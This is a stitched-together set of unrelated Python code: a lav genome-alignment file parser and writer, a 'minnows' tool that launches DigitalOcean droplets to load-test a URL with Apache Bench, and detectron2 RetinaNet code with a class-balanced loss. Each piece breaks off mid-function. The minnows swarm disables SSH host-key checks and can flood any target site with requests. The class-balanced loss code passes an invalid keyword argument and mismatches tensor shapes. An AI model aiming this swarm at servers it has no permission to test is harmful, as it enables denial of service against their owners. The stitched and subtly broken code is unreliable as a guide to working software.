end = int(fields[2])
contig = int(fields[4])
if (fields[3] == "1"): strand = "-"
else: strand = "+"
if (filename.endswith("-")):
assert (strand == "-"), "strand mismatch in \"%s\"" % line
filename = filename[:-1]
filename = do_path_subs(filename,self.path_subs)
return (filename,start,end,strand,contig)
def parse_h_stanza(self):
line = self.fetch_line(strip='"',report=" in h-stanza")
self.seq1_header = line
self.seq1_header_prefix = ""
if (line.startswith(">")):
self.seq1_header = line[1:].strip()
self.seq1_header_prefix = ">"
self.seq1_header = self.seq1_header.split(None,1)
if (len(self.seq1_header) > 0): self.seq1_header = self.seq1_header[0]
else: self.seq1_header = "seq1"
line = self.fetch_line(strip='"',report=" in h-stanza")
self.seq2_header = line
self.seq2_header_prefix = ""
if (line.startswith(">")):
self.seq2_header = line[1:].strip()
self.seq2_header_prefix = ">"
self.seq2_header = self.seq2_header.split(None,1)
if (len(self.seq2_header) > 0): self.seq2_header = self.seq2_header[0]
else: self.seq2_header = "seq2"
line = self.fetch_line(report=" in h-stanza")
assert (line == "}"), "improper h-stanza terminator (line %d, \"%s\")" \
% (self.lineNumber,line)
def parse_a_stanza(self):
"""returns the pair (score,pieces)
where pieces is a list of ungapped segments (start1,start2,length,pctId)
with start1,start2 origin-0"""
# 's' line -- score, 1 field
line = self.fetch_line(report=" in a-stanza")
fields = line.split()
assert (fields[0] == "s"), "s line expected in a-stanza (line %d, \"%s\")" \
% (self.lineNumber,line)
try: score = int(fields[1])
except: score = float(fields[1])
# 'b' line -- begin positions in seqs, 2 fields
line = self.fetch_line(report=" in a-stanza")
fields = line.split()
assert (fields[0] == "b"), "b line expected in a-stanza (line %d, \"%s\")" \
% (self.lineNumber,line)
beg1 = int(fields[1]) - 1
beg2 = int(fields[2]) - 1
# 'e' line -- end positions in seqs, 2 fields
line = self.fetch_line(report=" in a-stanza")
fields = line.split()
assert (fields[0] == "e"), "e line expected in a-stanza (line %d, \"%s\")" \
% (self.lineNumber,line)
len1 = int(fields[1]) - beg1
len2 = int(fields[2]) - beg2
# 'l' lines
pieces = []
while (True):
line = self.fetch_line(report=" in a-stanza")
fields = line.split()
if (fields[0] != "l"):
break
start1 = int(fields[1]) - 1
start2 = int(fields[2]) - 1
length = int(fields[3]) - start1
length2 = int(fields[4]) - start2
try: pctId = int(fields[5])
except: pctId = float(fields[5])
assert (length2 == length), "length mismatch in a-stanza"
pieces.append((start1+self.seq1_start,start2+self.seq2_start,length,pctId))
assert (line == "}"), "improper a-stanza terminator (line %d, \"%s\")" \
% (self.lineNumber,line)
return (score,pieces)
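# Example a-stanza and its parse (assuming seq1_start == seq2_start == 0):
#   a {
#     s 5000
#     b 1 1
#     e 100 100
#     l 1 1 50 95
#     l 61 61 100 90
#   }
# parse_a_stanza returns (5000, [(0, 0, 50, 95), (60, 60, 40, 90)]):
# the l lines' begin columns become origin-0 starts and their end
# columns are converted to ungapped-segment lengths.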
def parse_unknown_stanza(self):
lines = []
while (True):
line = self.fetch_line()
assert (line), "unexpected end of file (missing #:eof)"
if (line == "}"): break
lines.append(line)
return " " + "\n ".join(lines) + "\n"
def fetch_line(self,strip=True,requireLine=True,report=""):
if (strip == None): line = self.file.readline()
elif (strip == True): line = self.file.readline().strip()
else: line = self.file.readline().strip().strip(strip)
self.lineNumber += 1
if (requireLine):
assert (line), \
"unexpected blank line or end of file%s (line %d)" \
% (report,self.lineNumber)
return line
def d_stanza(self):
if (self.d_stanza_text == None): return ""
return "d {\n%s}" % self.d_stanza_text
def s_stanza(self):
if (self.seq1_filename == None): return ""
if (self.seq1_strand == "-"): seq1_strand = "1"
else: seq1_strand = "0"
if (self.seq2_strand == "-"): seq2_strand = "1"
else: seq2_strand = "0"
s = " \"%s\" %d %d %s %d\n"\
% (self.seq1_filename,self.seq1_start+1,self.seq1_end,
seq1_strand,self.seq1_contig)
s += " \"%s\" %d %d %s %d\n"\
% (self.seq2_filename,self.seq2_start+1,self.seq2_end,
seq2_strand,self.seq2_contig)
return "s {\n%s}" % s
def h_stanza(self):
if (self.seq1_header == None): return ""
s = " \"%s%s\"\n" % (self.seq1_header_prefix,self.seq1_header)
s += " \"%s%s\"\n" % (self.seq2_header_prefix,self.seq2_header)
return "h {\n%s}" % s
def build_alignment(self,score,pieces):
"""converts a score and pieces to an alignment"""
# build text
self.open_seqs()
text1 = text2 = ""
end1 = end2 = None
for (start1,start2,length,pctId) in pieces:
if (end1 != None):
if (start1 == end1): # insertion in sequence 2
text1 += self.seq1_gap * (start2-end2)
text2 += self.seq2_file.get(end2,start2-end2)
else: # insertion in sequence 1
text1 += self.seq1_file.get(end1,start1-end1)
text2 += self.seq2_gap * (start1-end1)
text1 += self.seq1_file.get(start1,length)
text2 += self.seq2_file.get(start2,length)
end1 = start1 + length
end2 = start2 + length
# create alignment
start1 = pieces[0][0]
start2 = pieces[0][1]
end1 = pieces[-1][0] + pieces[-1][2]
end2 = pieces[-1][1] + pieces[-1][2]
size1 = end1 - start1
size2 = end2 - start2
a = Alignment(score=score,species_to_lengths=self.species_to_lengths)
#if (self.seq1_strand == "-"): start1 = self.seq1_file.length - end1
a.add_component(Component(self.seq1_src,start1,size1,self.seq1_strand,text=text1))
#if (self.seq2_strand == "-"): start2 = self.seq2_file.length - end2
a.add_component(Component(self.seq2_src,start2,size2,self.seq2_strand,text=text2))
return a
def path_to_src_name(self,path_name):
# converts, e.g. ".../hg18/seq/chr13.nib" to "hg18.chr13"
if (path_name == None) or (path_name == ""): raise ValueError
if (path_name.endswith(".nib")): path_name = path_name[:-4]
if (path_name.endswith(".fa")): path_name = path_name[:-3]
if (path_name.endswith(".fasta")): path_name = path_name[:-6]
slash = path_name.rfind("/")
if (slash == -1): return path_name
name = path_name[slash+1:]
path_name = path_name[:slash]
if (path_name.endswith("/seq")): path_name = path_name[:-4]
slash = path_name.rfind("/")
if (slash != -1): path_name = path_name[slash+1:]
return path_name + "." + name
def header_to_src_name(self,header):
# converts, e.g. "hg18.chr13:115404472-117281897" to "hg18.chr13"
if (header == None) or (header == ""): raise ValueError
colon = header.rfind(":")
if (colon != -1): header = header[:colon]
if ("/" in header): raise ValueError
if (header.count(".") == 0):
return header
header = header.split(".")
if (header[0] == "") or (header[1] == ""): raise ValueError
return ".".join(header)
class ReaderIter(object):
def __init__(self,reader):
self.reader = reader
def __iter__(self):
return self
def next(self):
v = self.reader.next()
if (not v): raise StopIteration
return v
class LavAsPiecesReader(Reader):
"""Iterate over all lav blocks in a file in order, returning alignments
as score and pieces, as returned by Reader.parse_a_stanza"""
def build_alignment(self,score,pieces):
return (score,pieces)
class Writer(object):
# blockHash is a hash from (src1,strand1,src2,strand2) to a list of blocks;
# the blocks are collected on each call to write(), but the actual writing
# does not occur until close().
def __init__(self,file,attributes={}):
self.file = file
self.fname1 = None
self.fname2 = None
self.block = 0
self.blockHash = {} # (see note above)
if ("name_format_1" in attributes):
self.fname1 = attributes["name_format_1"]
if ("name_format_2" in attributes):
self.fname2 = attributes["name_format_2"]
if ("d_stanza" in attributes):
write_lav_marker(self)
print >>self.file,"d {"
print >>self.file,attributes["d_stanza"]
print >>self.file,"}"
def write(self,alignment):
if (len(alignment.components) != 2):
raise ValueError("%d-component alignment is not compatible with lav" %
len(alignment.components))
c1 = alignment.components[0]
c2 = alignment.components[1]
key = (c1.src,c1.strand,c2.src,c2.strand)
if (key not in self.blockHash): self.blockHash[key] = []
self.blockHash[key].append(alignment)
self.block += 1
def close(self):
keys = [key for key in self.blockHash]
keys = sort_keys_by_chrom (keys)
for key in keys:
(src1,strand1,src2,strand2) = key
alignment = self.blockHash[key][0]
self.src1 = src1
self.strand1 = strand1
self.length1 = alignment.src_size(src1)
self.src2 = src2
self.strand2 = strand2
self.length2 = alignment.src_size(src2)
self.write_s_stanza()
self.write_h_stanza()
for alignment in self.blockHash[key]:
self.write_a_stanza(alignment)
self.write_trailer()
if (self.file != sys.stdout): self.file.close()
def write_s_stanza(self):
self.write_lav_marker()
(strand1,flag1) = minus_or_nothing(self.strand1)
(strand2,flag2) = minus_or_nothing(self.strand2)
fname1 = build_filename(self.fname1,self.src1)
fname2 = build_filename(self.fname2,self.src2)
print >>self.file,"s {"
print >>self.file," \"%s%s\" 1 %d %d 1" \
% (fname1,strand1,self.length1,flag1)
print >>self.file," \"%s%s\" 1 %d %d 1" \
% (fname2,strand2,self.length2,flag2)
print >>self.file,"}"
def write_h_stanza(self):
strand1 = rc_or_nothing(self.strand1)
strand2 = rc_or_nothing(self.strand2)
print >>self.file,"h {"
print >>self.file," \"> %s%s\"" % (self.src1,strand1)
print >>self.file," \"> %s%s\"" % (self.src2,strand2)
print >>self.file,"}"
def write_a_stanza(self,alignment):
c1 = alignment.components[0]
pos1 = c1.start
text1 = c1.text.upper()
c2 = alignment.components[1]
pos2 = c2.start
text2 = c2.text.upper()
# collect ungapped pieces
pieces = []
piece1 = None
for ix in range(len(text1)):
ch1 = text1[ix]
ch2 = text2[ix]
nonGap = (ch1 != "-") and (ch2 != "-")
#!/bin/env python
"""
The MIT License
Copyright (c) 2010 The Chicago Tribune & Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from multiprocessing import Pool
import os
import json
import re
import socket
import time
import urllib2
import csv
import math
import random
from dop.client import Client
import paramiko
STATE_FILENAME = os.path.expanduser('~/.minnows')
# Utilities
def _read_server_list():
if not os.path.isfile(STATE_FILENAME):
return None, None, None, []
with open(STATE_FILENAME, 'r') as f:
server_state = json.loads(f.read())
return server_state['client_key'], server_state['api_key'], server_state['login'], server_state['droplets']
def _write_server_list(client_key, api_key, login, droplets):
with open(STATE_FILENAME, 'w') as f:
d = {
'client_key' : client_key,
'api_key' : api_key,
'login' : login,
'droplets' : [d.id for d in droplets]
}
f.write(json.dumps(d))
def _delete_server_list():
os.remove(STATE_FILENAME)
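# The state file above is plain JSON; a hypothetical ~/.minnows looks like:
#   {"client_key": "...", "api_key": "...", "login": "root",
#    "droplets": [123456, 123457]}
# Only droplet ids are persisted; status() and down() re-fetch the full
# droplet objects from the API.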
# Methods
def up(count, client_key, api_key, login, size = 66, region_id = 1, ssh_keys = None):
"""
Startup the load testing server.
"""
count = int(count)
client = Client(client_key, api_key)
print 'Attempting to call up %i minnows.' % count
if not ssh_keys:
ssh_keys = [str(k.id) for k in client.all_ssh_keys()]
droplet_ids = []
droplets = []
#25489 is ubuntu 12.04
for i in range(0, count):
droplet = client.create_droplet('minnow-%s' % i, size, 25489, region_id, ssh_keys)
droplet_ids.append(droplet.id)
print "Started droplets with ids: %s" % ','.join([str(i) for i in droplet_ids])
print "Waiting for minnows to wake up..."
for drop_id in droplet_ids:
droplet = client.show_droplet(drop_id)
while (not droplet.status == 'active') or droplet.ip_address == -1:
print '.'
time.sleep(4)
droplet = client.show_droplet(drop_id)
droplets.append(droplet)
print "Droplet id %s is ready" % drop_id
print "The school of minnows has been assembled."
_write_server_list(client_key, api_key, login, droplets)
print "Arming the minnows with Apache Bench..."
#TODO: Can't ssh into the servers for a bit...is there a better way to do this rather than
#sleeping for an arbitrary amount of time?
time.sleep(20)
params = []
for droplet in droplets:
params.append({
'droplet_id': droplet.id,
'ip_address': droplet.ip_address,
'login': login,
})
# Spin up processes for connecting to the droplets
pool = Pool(len(params))
pool.map(_install_apache_utils, params)
return
def status():
"""
Report the status of the load testing servers.
"""
client_key, api_key, login, droplet_ids = _read_server_list()
client = Client(client_key, api_key)
if len(droplet_ids) == 0:
print 'No minnows have been mobilized.'
return
print "Getting status of minnows"
for drop_id in droplet_ids:
droplet = client.show_droplet(drop_id)
print 'minnow %s: %s @ %s' % (droplet.id, droplet.status, droplet.ip_address)
def down():
"""
Shutdown the load testing server.
"""
client_key, api_key, login, droplet_ids = _read_server_list()
if not droplet_ids:
print 'No minnows have been mobilized.'
return
print 'Connecting to the ocean.'
client = Client(client_key, api_key)
for droplet_id in droplet_ids:
res = client.destroy_droplet(droplet_id)
print "Destroyed %s" % res
_delete_server_list()
def _install_apache_utils(params):
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
params['ip_address'],
username=params['login'])
stdin, stdout, stderr = client.exec_command('apt-get install apache2-utils -y')
stdout.read()
print "Armed minnow %s with Apache Bench" % params['droplet_id']
except socket.error, e:
return e
def _attack(params):
"""
Test the target URL with requests.
Intended for use with multiprocessing.
"""
print 'minnow %i is joining the school.' % params['i']
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
params['ip_address'],
username=params['login'])
print 'minnow %i is firing her machine gun. Bang bang!' % params['i']
options = ''
if params['headers'] != '':
for h in params['headers'].split(';'):
options += ' -H "%s"' % h
stdin, stdout, stderr = client.exec_command('tempfile -s .csv')
params['csv_filename'] = stdout.read().strip()
if params['csv_filename']:
options += ' -e %(csv_filename)s' % params
else:
print 'minnow %i lost sight of the target (connection timed out creating csv_filename).' % params['i']
return None
if params['post_file']:
os.system("scp -q -o 'StrictHostKeyChecking=no' %s %s@%s:/tmp/honeycomb" % (params['post_file'], params['login'], params['ip_address']))
options += ' -k -T "%(mime_type)s; charset=UTF-8" -p /tmp/honeycomb' % params
params['options'] = options
benchmark_command = 'ab -r -n %(num_requests)s -c %(concurrent_requests)s -C "sessionid=NotARealSessionID" %(options)s "%(url)s"' % params
stdin, stdout, stderr = client.exec_command(benchmark_command)
response = {}
ab_results = stdout.read()
ms_per_request_search = re.search('Time\ per\ request:\s+([0-9.]+)\ \[ms\]\ \(mean\)', ab_results)
if not ms_per_request_search:
print 'minnow %i lost sight of the target (connection timed out running ab).' % params['i']
return None
requests_per_second_search = re.search('Requests\ per\ second:\s+([0-9.]+)\ \[#\/sec\]\ \(mean\)', ab_results)
failed_requests = re.search('Failed\ requests:\s+([0-9.]+)', ab_results)
complete_requests_search = re.search('Complete\ requests:\s+([0-9]+)', ab_results)
response['ms_per_request'] = float(ms_per_request_search.group(1))
response['requests_per_second'] = float(requests_per_second_search.group(1))
response['failed_requests'] = float(failed_requests.group(1))
response['complete_requests'] = float(complete_requests_search.group(1))
stdin, stdout, stderr = client.exec_command('cat %(csv_filename)s' % params)
response['request_time_cdf'] = []
for row in csv.DictReader(stdout):
row["Time in ms"] = float(row["Time in ms"])
response['request_time_cdf'].append(row)
if not response['request_time_cdf']:
print 'minnow %i lost sight of the target (connection timed out reading csv).' % params['i']
return None
print 'minnow %i is out of ammo.' % params['i']
client.close()
return response
except socket.error, e:
return e
def _print_results(results, params, csv_filename):
"""
Print summarized load-testing results.
"""
timeout_minnows = [r for r in results if r is None]
exception_minnows = [r for r in results if type(r) == socket.error]
complete_minnows = [r for r in results if r is not None and type(r) != socket.error]
timeout_minnows_params = [p for r,p in zip(results, params) if r is None]
exception_minnows_params = [p for r,p in zip(results, params) if type(r) == socket.error]
complete_minnows_params = [p for r,p in zip(results, params) if r is not None and type(r) != socket.error]
num_timeout_minnows = len(timeout_minnows)
num_exception_minnows = len(exception_minnows)
num_complete_minnows = len(complete_minnows)
if exception_minnows:
print ' %i of your minnows didn\'t make it to the action. They might be taking a little longer than normal to find their machine guns, or may have been terminated without using "minnows down".' % num_exception_minnows
if timeout_minnows:
print ' Target timed out without fully responding to %i minnows.' % num_timeout_minnows
if num_complete_minnows == 0:
print ' No minnows completed the mission. Apparently your minnows are peace-loving hippies.'
return
complete_results = [r['complete_requests'] for r in complete_minnows]
total_complete_requests = sum(complete_results)
print ' Complete requests:\t\t%i' % total_complete_requests
complete_results = [r['failed_requests'] for r in complete_minnows]
total_failed_requests = sum(complete_results)
print ' Failed requests:\t\t%i' % total_failed_requests
complete_results = [r['requests_per_second'] for r in complete_minnows]
mean_requests = sum(complete_results)
print ' Requests per second:\t%f [#/sec]' % mean_requests
complete_results = [r['ms_per_request'] for r in complete_minnows]
mean_response = sum(complete_results) / num_complete_minnows
print ' Time per request:\t\t%f [ms] (mean of minnows)' % mean_response
# Recalculate the global cdf based on the csv files collected from
# ab. Can do this by sampling the request_time_cdfs for each of
# the completed minnows in proportion to the number of
# complete_requests they have
n_final_sample = 100
sample_size = 100*n_final_sample
n_per_minnow = [int(r['complete_requests']/total_complete_requests*sample_size)
for r in complete_minnows]
sample_response_times = []
for n, r in zip(n_per_minnow, complete_minnows):
cdf = r['request_time_cdf']
for i in range(n):
j = int(random.random()*len(cdf))
sample_response_times.append(cdf[j]["Time in ms"])
sample_response_times.sort()
request_time_cdf = sample_response_times[0:sample_size:sample_size/n_final_sample]
print ' 50%% responses faster than:\t%f [ms]' % request_time_cdf[49]
print ' 90%% responses faster than:\t%f [ms]' % request_time_cdf[89]
if mean_response < 500:
print 'Mission Assessment: Target crushed minnow offensive.'
elif mean_response < 1000:
print 'Mission Assessment: Target successfully fended off the school.'
elif mean_response < 1500:
print 'Mission Assessment: Target wounded, but operational.'
elif mean_response < 2000:
print 'Mission Assessment: Target severely compromised.'
else:
print 'Mission Assessment: school annihilated target.'
if csv_filename:
with open(csv_filename, 'w') as stream:
writer = csv.writer(stream)
header = ["% faster than", "all minnows [ms]"]
for p in complete_minnows_params:
header.append("minnow %(droplet_id)s [ms]" % p)
writer.writerow(header)
for i in range(100):
row = [i, request_time_cdf[i]]
for r in complete_minnows:
row.append(r['request_time_cdf'][i]["Time in ms"])
writer.writerow(row)
def attack(url, n, c, **options):
"""
Test the root url of this site.
"""
| |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
import math
import numpy as np
from typing import List
import torch
from fvcore.nn import giou_loss, sigmoid_focal_loss_jit, smooth_l1_loss
from torch import nn
from torch.nn import functional as F
from detectron2.data.detection_utils import convert_image_to_rgb
from detectron2.layers import ShapeSpec, batched_nms, cat, get_norm
from detectron2.structures import Boxes, ImageList, Instances, pairwise_iou
from detectron2.utils.events import get_event_storage
from ..anchor_generator import build_anchor_generator
from ..backbone import build_backbone
from ..box_regression import Box2BoxTransform
from ..matcher import Matcher
from ..postprocessing import detector_postprocess
from .build import META_ARCH_REGISTRY
__all__ = ["RetinaNet"]
def permute_to_N_HWA_K(tensor, K):
"""
Transpose/reshape a tensor from (N, (Ai x K), H, W) to (N, (HxWxAi), K)
"""
assert tensor.dim() == 4, tensor.shape
N, _, H, W = tensor.shape
tensor = tensor.view(N, -1, K, H, W)
tensor = tensor.permute(0, 3, 4, 1, 2)
tensor = tensor.reshape(N, -1, K) # Size=(N,HWA,K)
return tensor
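# Shape sanity check for permute_to_N_HWA_K (illustrative sizes): with
# N=2, A=9 anchors, K=4 box parameters and a 3x3 feature map,
# (2, 36, 3, 3) -> (2, HxWxA, K) == (2, 81, 4).
_t = torch.randn(2, 9 * 4, 3, 3)
assert permute_to_N_HWA_K(_t, 4).shape == (2, 81, 4)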
def focal_loss(labels, logits, alpha, gamma):
"""Compute the focal loss between `logits` and the ground truth `labels`.
Focal loss = -alpha_t * (1-pt)^gamma * log(pt)
where pt is the probability of being classified to the true class.
pt = p (if true class), otherwise pt = 1 - p. p = sigmoid(logit).
Args:
labels: A float tensor of size [batch, num_classes].
logits: A float tensor of size [batch, num_classes].
alpha: A float tensor of size [batch_size]
specifying per-example weight for balanced cross entropy.
gamma: A float scalar modulating loss from hard and easy examples.
Returns:
focal_loss: A float32 scalar representing normalized total loss.
"""
BCLoss = F.binary_cross_entropy_with_logits(input=logits, target=labels, reduction="none")
if gamma == 0.0:
modulator = 1.0
else:
modulator = torch.exp(-gamma * labels * logits - gamma * torch.log(1 +
torch.exp(-1.0 * logits)))
loss = modulator * BCLoss
weighted_loss = alpha * loss
focal_loss = torch.sum(weighted_loss)
focal_loss /= torch.sum(labels)
return focal_loss
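# Hedged sanity check (illustration only): with gamma == 0 the modulator is 1,
# so the loss reduces to an alpha-weighted BCE summed over all elements and
# divided by the number of positive labels:
#
#   labels = torch.tensor([[1.0, 0.0], [0.0, 1.0]])
#   logits = torch.zeros(2, 2)
#   focal_loss(labels, logits, alpha=torch.ones(2, 2), gamma=0.0)
#   # -> 4 * log(2) / 2 ~= 1.3863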
def CB_loss(labels, logits, samples_per_cls, no_of_classes, loss_type, beta, gamma):
"""Compute the Class Balanced Loss between `logits` and the ground truth `labels`.
Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits)
where Loss is one of the standard losses used for Neural Networks.
Args:
      labels: An int tensor of size [batch].
      logits: A float tensor of size [batch, no_of_classes].
      samples_per_cls: A tensor of size [no_of_classes + 1] holding the
        per-class sample counts (the last entry is the background class).
no_of_classes: total number of classes. int
loss_type: string. One of "sigmoid", "focal", "softmax".
beta: float. Hyperparameter for Class balanced loss.
gamma: float. Hyperparameter for Focal loss.
Returns:
cb_loss: A float tensor representing class balanced loss
"""
    zero_class_index = samples_per_cls == 0
    samples_per_cls[zero_class_index] = 1
    # This variant derives an adaptive per-class beta of (n - 1) / n from the
    # sample counts, so the `beta` argument passed in is effectively unused.
    beta = (samples_per_cls - 1.0) / samples_per_cls.float()
    effective_num = 1.0 - torch.pow(beta, samples_per_cls)
    weights = (1.0 - beta) / effective_num
    weights[zero_class_index] = 0
    weights = weights / torch.sum(weights) * (no_of_classes - weights[zero_class_index].shape[0])
    labels_one_hot = F.one_hot(labels, no_of_classes + 1).float()
    weights = weights.float().unsqueeze(0)
    weights = weights.repeat(labels_one_hot.shape[0], 1) * labels_one_hot
    weights = weights.sum(1)
    weights = weights.unsqueeze(1)
    weights = weights.repeat(1, no_of_classes)
if loss_type == "focal":
cb_loss = focal_loss(labels_one_hot[:, :-1], logits, weights, gamma)
elif loss_type == "sigmoid":
cb_loss = F.binary_cross_entropy_with_logits(input=logits, target=labels_one_hot, weights=weights)
elif loss_type == "softmax":
pred = logits.softmax(dim=1)
cb_loss = F.binary_cross_entropy(input=pred, target=labels_one_hot, weight=weights)
return cb_loss
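# Hedged usage sketch (illustration only; all values are assumptions):
#
#   labels = torch.tensor([0, 1, 1, 3])                 # 3 = background when C == 3
#   logits = torch.randn(4, 3)                          # (batch, C)
#   samples_per_cls = torch.tensor([10, 100, 1000, 0])  # length C + 1
#   loss = CB_loss(labels, logits, samples_per_cls, no_of_classes=3,
#                  loss_type="focal", beta=0.999, gamma=2.0)
#
# Note: the beta argument is overridden internally by the adaptive per-class
# beta computed from samples_per_cls (see the comment inside CB_loss).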
@META_ARCH_REGISTRY.register()
class RetinaNet(nn.Module):
"""
Implement RetinaNet in :paper:`RetinaNet`.
"""
def __init__(self, cfg):
super().__init__()
# fmt: off
self.num_classes = cfg.MODEL.RETINANET.NUM_CLASSES
self.in_features = cfg.MODEL.RETINANET.IN_FEATURES
# Loss parameters:
self.focal_loss_alpha = cfg.MODEL.RETINANET.FOCAL_LOSS_ALPHA
self.focal_loss_gamma = cfg.MODEL.RETINANET.FOCAL_LOSS_GAMMA
self.cb_loss_beta = cfg.MODEL.RETINANET.CB_LOSS_BETA
self.smooth_l1_loss_beta = cfg.MODEL.RETINANET.SMOOTH_L1_LOSS_BETA
self.box_reg_loss_type = cfg.MODEL.RETINANET.BBOX_REG_LOSS_TYPE
# Inference parameters:
self.score_threshold = cfg.MODEL.RETINANET.SCORE_THRESH_TEST
self.topk_candidates = cfg.MODEL.RETINANET.TOPK_CANDIDATES_TEST
self.nms_threshold = cfg.MODEL.RETINANET.NMS_THRESH_TEST
self.max_detections_per_image = cfg.TEST.DETECTIONS_PER_IMAGE
# Vis parameters
self.vis_period = cfg.VIS_PERIOD
self.input_format = cfg.INPUT.FORMAT
# fmt: on
self.backbone = build_backbone(cfg)
backbone_shape = self.backbone.output_shape()
feature_shapes = [backbone_shape[f] for f in self.in_features]
self.head = RetinaNetHead(cfg, feature_shapes)
self.anchor_generator = build_anchor_generator(cfg, feature_shapes)
# Matching and loss
self.box2box_transform = Box2BoxTransform(weights=cfg.MODEL.RETINANET.BBOX_REG_WEIGHTS)
self.anchor_matcher = Matcher(
cfg.MODEL.RETINANET.IOU_THRESHOLDS,
cfg.MODEL.RETINANET.IOU_LABELS,
allow_low_quality_matches=True,
)
self.register_buffer("pixel_mean", torch.Tensor(cfg.MODEL.PIXEL_MEAN).view(-1, 1, 1))
self.register_buffer("pixel_std", torch.Tensor(cfg.MODEL.PIXEL_STD).view(-1, 1, 1))
"""
In Detectron1, loss is normalized by number of foreground samples in the batch.
When batch size is 1 per GPU, #foreground has a large variance and
        using it leads to lower performance. Here we maintain an EMA of #foreground to
stabilize the normalizer.
"""
self.loss_normalizer = 100 # initialize with any reasonable #fg that's not too small
self.loss_normalizer_momentum = 0.9
@property
def device(self):
return self.pixel_mean.device
def visualize_training(self, batched_inputs, results):
"""
A function used to visualize ground truth images and final network predictions.
It shows ground truth bounding boxes on the original image and up to 20
predicted object bounding boxes on the original image.
Args:
batched_inputs (list): a list that contains input to the model.
results (List[Instances]): a list of #images elements.
"""
from detectron2.utils.visualizer import Visualizer
assert len(batched_inputs) == len(
results
), "Cannot visualize inputs and results of different sizes"
storage = get_event_storage()
max_boxes = 20
image_index = 0 # only visualize a single image
img = batched_inputs[image_index]["image"]
img = convert_image_to_rgb(img.permute(1, 2, 0), self.input_format)
v_gt = Visualizer(img, None)
v_gt = v_gt.overlay_instances(boxes=batched_inputs[image_index]["instances"].gt_boxes)
anno_img = v_gt.get_image()
processed_results = detector_postprocess(results[image_index], img.shape[0], img.shape[1])
predicted_boxes = processed_results.pred_boxes.tensor.detach().cpu().numpy()
v_pred = Visualizer(img, None)
v_pred = v_pred.overlay_instances(boxes=predicted_boxes[0:max_boxes])
prop_img = v_pred.get_image()
vis_img = np.vstack((anno_img, prop_img))
vis_img = vis_img.transpose(2, 0, 1)
vis_name = f"Top: GT bounding boxes; Bottom: {max_boxes} Highest Scoring Results"
storage.put_image(vis_name, vis_img)
def forward(self, batched_inputs):
"""
Args:
batched_inputs: a list, batched outputs of :class:`DatasetMapper` .
Each item in the list contains the inputs for one image.
For now, each item in the list is a dict that contains:
* image: Tensor, image in (C, H, W) format.
* instances: Instances
Other information that's included in the original dicts, such as:
* "height", "width" (int): the output resolution of the model, used in inference.
See :meth:`postprocess` for details.
Returns:
dict[str: Tensor]:
mapping from a named loss to a tensor storing the loss. Used during training only.
"""
images = self.preprocess_image(batched_inputs)
features = self.backbone(images.tensor)
features = [features[f] for f in self.in_features]
anchors = self.anchor_generator(features)
pred_logits, pred_anchor_deltas = self.head(features)
# Transpose the Hi*Wi*A dimension to the middle:
pred_logits = [permute_to_N_HWA_K(x, self.num_classes) for x in pred_logits]
pred_anchor_deltas = [permute_to_N_HWA_K(x, 4) for x in pred_anchor_deltas]
if self.training:
assert "instances" in batched_inputs[0], "Instance annotations are missing in training!"
gt_instances = [x["instances"].to(self.device) for x in batched_inputs]
gt_labels, gt_boxes = self.label_anchors(anchors, gt_instances)
losses = self.losses(anchors, pred_logits, gt_labels, pred_anchor_deltas, gt_boxes)
if self.vis_period > 0:
storage = get_event_storage()
if storage.iter % self.vis_period == 0:
results = self.inference(
anchors, pred_logits, pred_anchor_deltas, images.image_sizes
)
self.visualize_training(batched_inputs, results)
return losses
else:
results = self.inference(anchors, pred_logits, pred_anchor_deltas, images.image_sizes)
processed_results = []
for results_per_image, input_per_image, image_size in zip(
results, batched_inputs, images.image_sizes
):
height = input_per_image.get("height", image_size[0])
width = input_per_image.get("width", image_size[1])
r = detector_postprocess(results_per_image, height, width)
processed_results.append({"instances": r})
return processed_results
def losses(self, anchors, pred_logits, gt_labels, pred_anchor_deltas, gt_boxes):
"""
Args:
anchors (list[Boxes]): a list of #feature level Boxes
gt_labels, gt_boxes: see output of :meth:`RetinaNet.label_anchors`.
Their shapes are (N, R) and (N, R, 4), respectively, where R is
the total number of anchors across levels, i.e. sum(Hi x Wi x Ai)
pred_logits, pred_anchor_deltas: both are list[Tensor]. Each element in the
list corresponds to one level and has shape (N, Hi * Wi * Ai, K or 4).
Where K is the number of classes used in `pred_logits`.
Returns:
dict[str, Tensor]:
mapping from a named loss to a scalar tensor
storing the loss. Used during training only. The dict keys are:
"loss_cls" and "loss_box_reg"
"""
num_images = len(gt_labels)
gt_labels = torch.stack(gt_labels) # (N, R)
anchors = type(anchors[0]).cat(anchors).tensor # (R, 4)
gt_anchor_deltas = [self.box2box_transform.get_deltas(anchors, k) for k in gt_boxes]
gt_anchor_deltas = torch.stack(gt_anchor_deltas) # (N, R, 4)
valid_mask = gt_labels >= 0
pos_mask = (gt_labels >= 0) & (gt_labels != self.num_classes)
num_pos_anchors = pos_mask.sum().item()
get_event_storage().put_scalar("num_pos_anchors", num_pos_anchors / num_images)
self.loss_normalizer = self.loss_normalizer_momentum * self.loss_normalizer + (
1 - self.loss_normalizer_momentum
) * max(num_pos_anchors, 1)
# classification and regression loss
"""gt_labels_target = F.one_hot(gt_labels[valid_mask], num_classes=self.num_classes + 1)[
:, :-1
] # no loss for the last (background) class
loss_cls = sigmoid_focal_loss_jit(
cat(pred_logits, dim=1)[valid_mask],
gt_labels_target.to(pred_logits[0].dtype),
